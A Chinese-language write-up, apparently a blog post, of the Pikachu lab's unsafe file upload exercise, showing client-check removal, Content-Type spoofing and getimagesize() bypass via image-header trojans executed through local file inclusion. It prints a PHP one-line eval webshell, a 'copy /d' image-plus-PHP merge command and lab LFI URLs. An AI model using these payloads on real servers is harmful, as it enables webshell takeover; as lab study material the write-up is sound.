Unsafe upfileupload

文章目录

      • [client check](#client check)
      • [MIME Type](#MIME Type)
      • getimagesize

文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断

比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。

如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。

所以,在设计文件上传功能时,一定要对传进来的文件进行严格的安全考虑。比如:

​ --验证文件类型、后缀名、大小;

​ --验证文件的上传方式;

​ --对文件进行一定复杂的重命名;

​ --不要暴露文件上传后的路径;

client check

上传一句话木马1.php

php 复制代码
<?php eval(@$_POST['password']);?>

报错显示说不符合要求

查看页面代码,发现有js函数做验证

前端校验不值一提,直接删除js校验函数

这时候一句话木马已经上传,可以通过蚁剑来连接进入

木马上传的路径

192.168.80.139/pikachu/vul/unsafeupload/uploads/1.php

MIME Type

MIME(多用途互联网邮件扩展类型),是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。

每个MIME类型由两部分组成,前面是数据的大类别,例如声音audio、图像image等,后面定义具体的种类,常见的MIME类型,比如:

超文本标记语言文本.html texthtml

普通文本.txt text/plain

RTF文本.rtf application/rtf

GIF图形.gif image/gif

JPEG图形.ipeg.jpg image/jpeg

继续提交php木马文件,使用Burpsuite抓取数据包,发送到Repeater修改Content-Type

getimagesize

菜鸟教程

GetimagesizePHP提供的一个用来判断目标文件是不是图片的函数

对文件的开头内容进行了检测并且通过二进制识别是否为图像,那么就可以利用文件头欺骗,来让getimagesize()函数检测无效。

1、制作图片木马方式一

这里用GIF的文件头,在一句话木马前加上GIF的文件头标识,后缀改为png格式

php 复制代码
GIF89a
<?php phpinfo(); ?> 

图片上传后保存的地址:http://192.168.80.139/pikachu/vul/unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png

通过使用文件包含路径去访问后门文件

php 复制代码
http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

2、制作图片木马方式二

准备一个jpeg格式的图片,还有一个php木马文件

通过CMD命令将两个合成一个ws.jpeg,生成的文件前面内容是2.jpeg,后面是12.php内容

bash 复制代码
copy /d 2.jpeg + 12.php   ws.jpeg

上传ws.jpeg图片

uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg

虽然我们绕过getimagesize(),成功上传图片,但只访问图片里面的php代码是执行不了的

需要通过文件包含路径去访问木马文件

http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
相关推荐
摸鱼也很难24 天前
小迪安全第四十二天笔记 简单的mysql注入 && mysql的基础知识 用户管理数据库模式 && mysql 写入与读取 && 跨库查询
笔记·安全·web安全·sql注入·pikachu
H轨迹H1 个月前
pikachu文件上传_2024-11-26
pikachu·web漏洞
来日可期x1 年前
Pikachu靶场——跨站请求伪造(CSRF)
安全·web安全·网络安全·系统安全·csrf·pikachu·跨站请求伪造
来日可期x1 年前
Pikachu靶场——SQL注入漏洞
sql·web安全·网络安全·系统安全·sql注入·pikachu
来日可期x1 年前
Pikachu靶场——文件上传漏洞(Unsafe upfileupload)
安全·web安全·网络安全·靶场·系统安全·pikachu·文件上传漏洞
来日可期x1 年前
Pikachu靶场——XXE 漏洞
安全·web安全·网络安全·系统安全·漏洞·xxe·pikachu
过期的秋刀鱼-1 年前
../../ 目录遍历
pikachu
Mr.洛 白1 年前
pikachu中RCE出现乱码的解决的方案
网络安全·靶场·pikachu